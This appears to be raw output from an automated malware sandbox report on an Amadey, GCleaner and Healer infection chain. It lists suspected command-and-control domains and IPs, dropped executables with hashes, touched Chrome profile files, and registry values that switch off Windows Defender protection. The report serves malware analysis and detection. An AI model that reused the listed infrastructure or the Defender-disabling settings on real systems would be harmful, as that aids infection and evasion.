US      8.8.8.8:53            dugong.ydns.eu                udp
DE      38.180.229.217:80     dugong.ydns.eu                tcp
N/A     224.0.0.251:5353                                    udp
US      8.8.8.8:53            avx.medianewsonline.com       udp
BG      185.176.43.98:80      avx.medianewsonline.com       tcp
BG      185.176.43.98:80      avx.medianewsonline.com       tcp
RU      176.113.115.7:80      176.113.115.7                 tcp
US      8.8.8.8:53            biochextryhub.bet             udp
US      172.67.192.128:443    biochextryhub.bet             tcp
N/A     127.0.0.1:9229                                      tcp
N/A     127.0.0.1:9229                                      tcp
DE      38.180.229.217:80     dugong.ydns.eu                tcp
US      8.8.8.8:53            circujitstorm.bet             udp
US      8.8.8.8:53            explorebieology.run           udp
US      8.8.8.8:53            gadgethgfub.icu               udp
US      8.8.8.8:53            moderzysics.top               udp
US      104.21.9.123:443      moderzysics.top               tcp
DE      5.75.210.149:443                                    tcp
RU      176.113.115.7:80      176.113.115.7                 tcp
US      8.8.8.8:53            dawtastream.bet               udp
US      8.8.8.8:53            foresctwhispers.top           udp
US      8.8.8.8:53            tracnquilforest.life          udp
US      8.8.8.8:53            collapimga.fun                udp
US      8.8.8.8:53            seizedsentec.online           udp
US      8.8.8.8:53            strawpeasaen.fun              udp
US      8.8.8.8:53            quietswtreams.life            udp
US      8.8.8.8:53            starrynsightsky.icu           udp
N/A     127.0.0.1:9229                                      tcp
N/A     127.0.0.1:9229                                      tcp
US      8.8.8.8:53            earthsymphzony.today          udp
US      8.8.8.8:53            steamcommunity.com            udp
GB      23.214.143.155:443    steamcommunity.com            tcp
RU      176.113.115.7:80      176.113.115.7                 tcp
RU      176.113.115.7:80      176.113.115.7                 tcp
DE      5.75.210.149:443                                    tcp
DE      38.180.229.217:80     dugong.ydns.eu                tcp
RU      176.113.115.7:80      176.113.115.7                 tcp
US      104.21.9.123:443      moderzysics.top               tcp
N/A     127.0.0.1:9229                                      tcp
N/A     127.0.0.1:9229                                      tcp
US      8.8.8.8:53            t.me                          udp
NL      149.154.167.99:443    t.me                          tcp
NL      149.154.167.99:443    t.me                          tcp
NL      149.154.167.99:443    t.me                          tcp
NL      149.154.167.99:443    t.me                          tcp
US      8.8.8.8:53            steamcommunity.com            udp
GB      23.214.143.155:443    steamcommunity.com            tcp
DE      5.75.210.83:443                                     tcp
DE      5.75.210.83:443                                     tcp
RU      176.113.115.7:80      176.113.115.7                 tcp
DE      5.75.210.83:443                                     tcp
DE      5.75.210.83:443                                     tcp
US      8.8.8.8:53            exarthynature.run             udp
US      104.21.16.1:443       exarthynature.run             tcp
US      104.21.16.1:443       exarthynature.run             tcp
DE      5.75.210.83:443                                     tcp
US      104.21.16.1:443       exarthynature.run             tcp
DE      5.75.210.83:443                                     tcp
DE      5.75.210.83:443                                     tcp
DE      5.75.210.83:443                                     tcp
DE      5.75.210.83:443                                     tcp
N/A     127.0.0.1:9229                                      tcp
N/A     127.0.0.1:9229                                      tcp
DE      5.75.210.83:443                                     tcp
NL      185.156.73.73:80      185.156.73.73                 tcp
US      8.8.8.8:53            www.google.com                udp
GB      216.58.204.68:443     www.google.com                udp
GB      216.58.204.68:443     www.google.com                tcp
US      8.8.8.8:53            ogads-pa.googleapis.com       udp
US      8.8.8.8:53            apis.google.com               udp
GB      216.58.201.110:443    apis.google.com               udp
GB      142.250.187.202:443   ogads-pa.googleapis.com       udp
GB      142.250.187.202:443   ogads-pa.googleapis.com       tcp
US      8.8.8.8:53            play.google.com               udp
GB      142.250.200.14:443    play.google.com               udp
GB      142.250.200.14:443    play.google.com               tcp
GB      142.250.200.14:443    play.google.com               udp
GB      142.250.200.14:443    play.google.com               tcp
DE      5.75.210.83:443                                     tcp
DE      5.75.210.83:443                                     tcp
DE      5.75.210.83:443                                     tcp
DE      5.75.210.83:443                                     tcp
US      8.8.8.8:53            steamcommunity.com            udp
GB      23.214.143.155:443    steamcommunity.com            tcp
US      8.8.8.8:53            farmingtzricks.top            udp
US      172.67.220.226:443    farmingtzricks.top            tcp
NL      185.156.73.73:80      185.156.73.73                 tcp
US      172.67.220.226:443    farmingtzricks.top            tcp
US      172.67.220.226:443    farmingtzricks.top            tcp
US      172.67.220.226:443    farmingtzricks.top            tcp
US      8.8.8.8:53            croprojegies.run              udp
US      104.21.112.1:443      croprojegies.run              tcp
DE      5.75.210.83:443                                     tcp
US      172.67.220.226:443    farmingtzricks.top            tcp
US      172.67.220.226:443    farmingtzricks.top            tcp
DE      5.75.210.83:443                                     tcp
RU      176.113.115.7:80      176.113.115.7                 tcp
DE      5.75.210.83:443                                     tcp
DE      5.75.210.83:443                                     tcp
N/A     127.0.0.1:9229                                      tcp
N/A     127.0.0.1:9229                                      tcp
RU      45.93.20.28:80        45.93.20.28                   tcp
US      8.8.8.8:53            towerbingobongoboom.com       udp
DE      5.75.210.83:443                                     tcp
US      213.209.150.137:4000  towerbingobongoboom.com       tcp
US      213.209.150.137:4086  towerbingobongoboom.com       tcp
DE      5.75.210.83:443                                     tcp

Files

C:\Users\Admin\AppData\Local\Temp\uQGIWnT9Z.hta

MD5 b5cd89679873d940b659a140ac71c421
SHA1 1bf3d9c2f1bc5cebb569a3a6c94a06aabe576b2a
SHA256 2ada2a969c213ed56c5b0863d24a115c12c3bdf9ad03dc6f56d6c6530b6987b3
SHA512 51ea850999e05d0525bc95f0b842e50ed3e7841cc169a4616d05812097cab86bf41f0e8b579c28e2e5ff05c2753afc3349af27fafd0a637a383814f0fc701161

\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE

MD5 93da4bdbae52d91d32a34c140466e8cf
SHA1 2177f234160ef77058d2237a8f97c1d663647240
SHA256 878228e580cd27a72a847922f9b16b7d16d0797c68aa9e6642ae3da13518de7a
SHA512 14d14d6d8d436953ed43483b8b3ba30a4f1df73eb2eca055c047bb0b7e328150ae0c49122a657f5f8ab752872e5d40b791e793675110df5c90440077f446b91a

memory/2740-15-0x00000000008D0000-0x0000000000D92000-memory.dmp

memory/2120-13-0x00000000064E0000-0x00000000069A2000-memory.dmp

memory/2120-12-0x00000000064E0000-0x00000000069A2000-memory.dmp

memory/840-31-0x00000000008E0000-0x0000000000DA2000-memory.dmp

memory/2740-30-0x00000000008D0000-0x0000000000D92000-memory.dmp

memory/840-33-0x00000000008E0000-0x0000000000DA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

MD5 5b3ed060facb9d57d8d0539084686870
SHA1 9cae8c44e44605d02902c29519ea4700b4906c76
SHA256 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

C:\Users\Admin\AppData\Local\Temp\9F0.tmp\9F1.tmp\9F2.bat

MD5 3895cb9413357f87a88c047ae0d0bd40
SHA1 227404dd0f7d7d3ea9601eecd705effe052a6c91
SHA256 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785
SHA512 a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6R7GRSTA81E19TM6VRF3.temp

MD5 b34640a9ac9cc8065dd034df44a2b887
SHA1 35b4457e76ff1e2f522556b7b01222f0aed76ba0
SHA256 f13f23ba617585c99d1c2f65c61d6a3ab1d06522333bdca720b53f2e629b30a4
SHA512 4450dfdbbefc937127ba5be9a725e37bddb9fe00f4868785dda336b67a7d4802355d8de79c1953faff53b8be320a8f9ba24549d46b8814fe078cccbd4f01587a

memory/1072-55-0x000000001B570000-0x000000001B852000-memory.dmp

memory/1072-56-0x0000000002820000-0x0000000002828000-memory.dmp

memory/840-57-0x00000000008E0000-0x0000000000DA2000-memory.dmp

memory/772-63-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

memory/772-64-0x0000000001E10000-0x0000000001E18000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

MD5 a9749ee52eefb0fd48a66527095354bb
SHA1 78170bcc54e1f774528dea3118b50ffc46064fe0
SHA256 b1663d4497ddd27a59f090b72adcedddac51724a1c126f7d6469f8045d065e15
SHA512 9d21f0e1e376b89df717403a3939ed86ef61095bb9f0167ff15c01d3bbbee03d4dd01b3e2769ecd921e40e43bab3cbf0a6844ab6f296982227b0cb507b4b0e25

memory/840-88-0x00000000008E0000-0x0000000000DA2000-memory.dmp

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

MD5 1dc908064451d5d79018241cea28bc2f
SHA1 f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256 d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA512 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

memory/1492-103-0x0000000004680000-0x0000000004AC0000-memory.dmp

memory/1492-104-0x0000000004680000-0x0000000004AC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe

MD5 f0ad59c5e3eb8da5cbbf9c731371941c
SHA1 171030104a6c498d7d5b4fce15db04d1053b1c29
SHA256 cda1bd2378835d92b53fca1f433da176f25356474baddacdd3cf333189961a19
SHA512 24c1bf55be8c53122218631dd90bf32e1407abb4b853014f60bac1886d14565985e9dea2f0c3974e463bd52385e039c245fffb9f7527b207f090685b9bede488

memory/2576-106-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2000-124-0x0000000000370000-0x0000000000A6E000-memory.dmp

memory/840-123-0x00000000066D0000-0x0000000006DCE000-memory.dmp

memory/840-122-0x00000000066D0000-0x0000000006DCE000-memory.dmp

memory/2000-128-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Sync Data\LevelDB\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Site Characteristics Database\000002.dbtmp

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Sync Data\LevelDB\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

memory/1492-353-0x0000000004680000-0x0000000004AC0000-memory.dmp

memory/1492-361-0x0000000004680000-0x0000000004AC0000-memory.dmp

memory/2576-363-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1712-383-0x0000000000E20000-0x000000000151E000-memory.dmp

memory/840-382-0x00000000066D0000-0x0000000006DCE000-memory.dmp

memory/840-381-0x00000000066D0000-0x0000000006DCE000-memory.dmp

memory/2000-380-0x0000000000370000-0x0000000000A6E000-memory.dmp

memory/840-379-0x00000000066D0000-0x0000000006DCE000-memory.dmp

memory/840-362-0x00000000008E0000-0x0000000000DA2000-memory.dmp

memory/2576-391-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2000-392-0x0000000000370000-0x0000000000A6E000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 aa54cea122ebab4bb7bff0114bf74b54
SHA1 080e6f9b8d7ad0db6fcf499e79f9401b6619b81d
SHA256 eeeef50376c10a6622f43cd7ff1c130ada831ff2a1396991720d3ae65ece07f5
SHA512 a9480739d21257ac449ab3901da6468ac12c510b01569667443edba6dbebb4743d6454cc878ef6923e5837a4421de3d042fb721055b8d5348711ca80c960b721

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations

MD5 961e3604f228b0d10541ebf921500c86
SHA1 6e00570d9f78d9cfebe67d4da5efe546543949a7
SHA256 f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed
SHA512 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

MD5 9eae63c7a967fc314dd311d9f46a45b7
SHA1 caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf
SHA256 4288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d
SHA512 bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Code Cache\js\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Code Cache\wasm\index-dir\the-real-index

MD5 7a6818fa03d4645f04eb546c1e62aab5
SHA1 50564da366f6a566cdc99c44f3d384977ea74ecd
SHA256 3d6448153ab371239a8dcabde67d400293e438353da05b691060a68e11736b52
SHA512 6b449e8377472c83b427b6760ff36939d6f46fd00ff7f05e345a8f4b4e1797a64e7dced5510c785596ac0a4053ebe20cb66bf4a6dc9b9af2ce119c991a4710c6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Code Cache\js\index-dir\the-real-index

MD5 25620b4b4d37406efb5fdfc48a1565d9
SHA1 46067242ed94d6dff864ebe6f66cdb63254839ea
SHA256 ed85669e13fab501cbd9536fbccfcce0f585747585b25763038694093fd4f48a
SHA512 1245fae43c9358d31c7137c4f90ae9bb6a988d494d499508ec139087e1566290910e6174194c6a0d3fa8250634ca3bc570dd55442bbe58d9a24f4b4b7f687b69

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Web Data-journal

MD5 c4daa02be2c0130bac2d8813bab4fca9
SHA1 6de7326b756a17f5dfd8501e43f82c3035d03f70
SHA256 f11b9c7c52cd3b0d8400def92a9af531edf1bafc04ea6208627f7378803a5ccf
SHA512 34ef1a77da2c064a41a7d5d83bf0ad0a020804c2e7bbe0ab0d055ac1411a7c68f04acbd01e6989809242e2ad7d1d4ffc3d4e8c45014ecc017551ce98ba34f329

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Web Data

MD5 11b6879796f062d38ba0ec2de7680830
SHA1 ecb0f97f93f8f882966a56589162e328e2c8211f
SHA256 871b3dbd6548fda17acf2dcdc284bcd6a118e6f547f0702c801710f268743a61
SHA512 ed54facfe77e0491a8102d2846b1854aee645e1848db39b11951555d013984de710c715936518cf04cb5dc0fcc7846dcddb017bba9d299c915008532782034f8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Favicons

MD5 3eea0768ded221c9a6a17752a09c969b
SHA1 d17d8086ed76ec503f06ddd0ac03d915aec5cdc7
SHA256 6923fd51e36b8fe40d6d3dd132941c5a693b02f6ae4d4d22b32b5fedd0e7b512
SHA512 fb5c51adf5a5095a81532e3634f48f5aedb56b7724221f1bf1ccb626cab40f87a3b07a66158179e460f1d0e14eeb48f0283b5df6471dd7a6297af6e8f3efb1f9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\History

MD5 90a1d4b55edf36fa8b4cc6974ed7d4c4
SHA1 aba1b8d0e05421e7df5982899f626211c3c4b5c1
SHA256 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c
SHA512 ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Sync Data\LevelDB\000003.log

MD5 90881c9c26f29fca29815a08ba858544
SHA1 06fee974987b91d82c2839a4bb12991fa99e1bdd
SHA256 a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a
SHA512 15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Sync Data\LevelDB\MANIFEST-000002

MD5 22bf0e81636b1b45051b138f48b3d148
SHA1 56755d203579ab356e5620ce7e85519ad69d614a
SHA256 e292f241daafc3df90f3e2d339c61c6e2787a0d0739aac764e1ea9bb8544ee97
SHA512 a4cf1f5c74e0df85dda8750be9070e24e19b8be15c6f22f0c234ef8423ef9ca3db22ba9ef777d64c33e8fd49fada6fcca26c1a14ba18e8472370533a1c65d8d0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Sync Data\LevelDB\LOG

MD5 f81a65416b02dc6b9de758a762a0a24e
SHA1 63f90dea174b45441eef15ccb6f458e503578eda
SHA256 4e7239ced5ebb34c4a59083ecfa7db3ddac9b05ceb198fdfe7aa1a30f92a129f
SHA512 7f033b31a5df224b8e71023ced7331143866e529eb1b9e498bcdf91f4ecc3f3091bbcfd94b00663ad9e6fbb0c95dde57fc5e92bf859cdf4d3c03dc2b37512873

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Sync Data\LevelDB\LOG

MD5 a1cb004fc85641553e525da236b0072b
SHA1 bc13c033475cb98424ca7ccfb87cb7cca0ff3357
SHA256 65ca4fc8a1257a15f3e7989fb79cc7ccfd930c15b95683438f8e9594549d74db
SHA512 d1ca3ad2b3b40306b75af698f32f978ea25f7b8db1118fd8469fbc1aeb72e826e2411e3e21496455dfe0e2f34092024fdce17198afb5ab7ce25da52ad5fe7bb1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Visited Links

MD5 b66e54a1a010240858faeda7526d9cb4
SHA1 823beb22c7c8b135ac28caed0ceb17ed799a3009
SHA256 8970cb7287830a97323bbad76779f68cf195becb9d44b34f6f9053fee5295e33
SHA512 0ea9aaa12160c3db0f54e518571ba79c0c4c8ca2da17ed3ef54b5fc5c96cba0aa7a6ed2a848f691025aef06192a5ebcd55c58cb253b3a747d3abe6e593d8aba9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Sync Data\LevelDB\000004.dbtmp

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe

MD5 35ed5fa7bd91bb892c13551512cf2062
SHA1 20a1fa4d9de4fe1a5ad6f7cdd63c1f2dee34d12c
SHA256 1e6929de62071a495e46a9d1afcdf6ec1486867a220457aacfdfa5a6b6ff5df4
SHA512 6b8acda217f82bd4b2519bc089f05cfbdff654b2556db378cf8344972de33d63c11f4713b2b342b3cb6e333c59517448995c33d739f72fdf00e8a81d46bd8483

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\638c47d8-55dc-4da3-aa75-047bf5724ac6.tmp

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

memory/1320-576-0x000000001B600000-0x000000001B8E2000-memory.dmp

memory/1320-577-0x00000000027E0000-0x00000000027E8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\690S2CX3LH08HIJ24016.temp

MD5 bd9fb2ab47c3c9d2e54f33c8e0a1f12d
SHA1 461166b43643854a3671d28303ecda1242a42c3e
SHA256 2a9be0acb294754c0a77f3e454b94eeceaaed88e59a894ec21f753540034845e
SHA512 6c322ce8b48aafa9eae74c4d23eb1b9ecc735c06defd8fd50168b5db84b75b7694df1821bebe2ddf5d2aeae9f87ed3d74dc5d54969dbffbfa797f29438b3e12d

memory/448-585-0x0000000002250000-0x0000000002258000-memory.dmp

memory/840-589-0x00000000008E0000-0x0000000000DA2000-memory.dmp

memory/1712-592-0x0000000000E20000-0x000000000151E000-memory.dmp

memory/840-591-0x00000000066D0000-0x0000000006DCE000-memory.dmp

memory/840-590-0x00000000066D0000-0x0000000006DCE000-memory.dmp

memory/1712-593-0x0000000000E20000-0x000000000151E000-memory.dmp

memory/2576-609-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2000-610-0x0000000000370000-0x0000000000A6E000-memory.dmp

memory/2000-617-0x0000000000370000-0x0000000000A6E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe

MD5 6006ae409307acc35ca6d0926b0f8685
SHA1 abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256 a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512 b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

memory/840-630-0x00000000066D0000-0x0000000006B6B000-memory.dmp

memory/1932-632-0x0000000000A80000-0x0000000000F1B000-memory.dmp

memory/840-631-0x00000000066D0000-0x0000000006B6B000-memory.dmp

memory/1932-634-0x0000000000A80000-0x0000000000F1B000-memory.dmp

memory/840-635-0x00000000008E0000-0x0000000000DA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe

MD5 641525fe17d5e9d483988eff400ad129
SHA1 8104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA256 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512 ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

memory/668-646-0x0000000000110000-0x0000000000180000-memory.dmp

memory/2276-660-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2276-648-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2276-659-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2276-658-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2276-656-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2276-654-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2276-652-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2276-650-0x0000000000400000-0x0000000000466000-memory.dmp

memory/1712-661-0x0000000000E20000-0x000000000151E000-memory.dmp

memory/2576-676-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\a4dc3984-959d-488a-969b-0deee2ba8b64.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Guest Profile\Local Storage\leveldb\000006.dbtmp

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

memory/840-740-0x00000000066D0000-0x0000000006B6B000-memory.dmp

memory/840-741-0x00000000066D0000-0x0000000006B6B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/1548-766-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1548-764-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1548-762-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1548-760-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1548-758-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1548-756-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1932-754-0x0000000000BA0000-0x0000000000C00000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000010.dbtmp

MD5 60e3f691077715586b918375dd23c6b0
SHA1 476d3eab15649c40c6aebfb6ac2366db50283d1b
SHA256 e91d13722e31f9b06c5df3582cad1ea5b73547ce3dc08b12ed461f095aad48ee
SHA512 d1c146d27bbf19362d6571e2865bb472ce4fe43dc535305615d92d6a2366f98533747a8a70a578d1f00199f716a61ce39fac5cab9dd67e9c044bc49e7343130e

C:\ProgramData\IEBFHCAKFBGDHIDHIDBK

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

Analysis: behavioral2

Detonation Overview

Submitted 2025-03-06 05:22

Reported 2025-03-06 05:25

Platform win10v2004-20250217-en

Max time kernel 145s

Max time network 149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
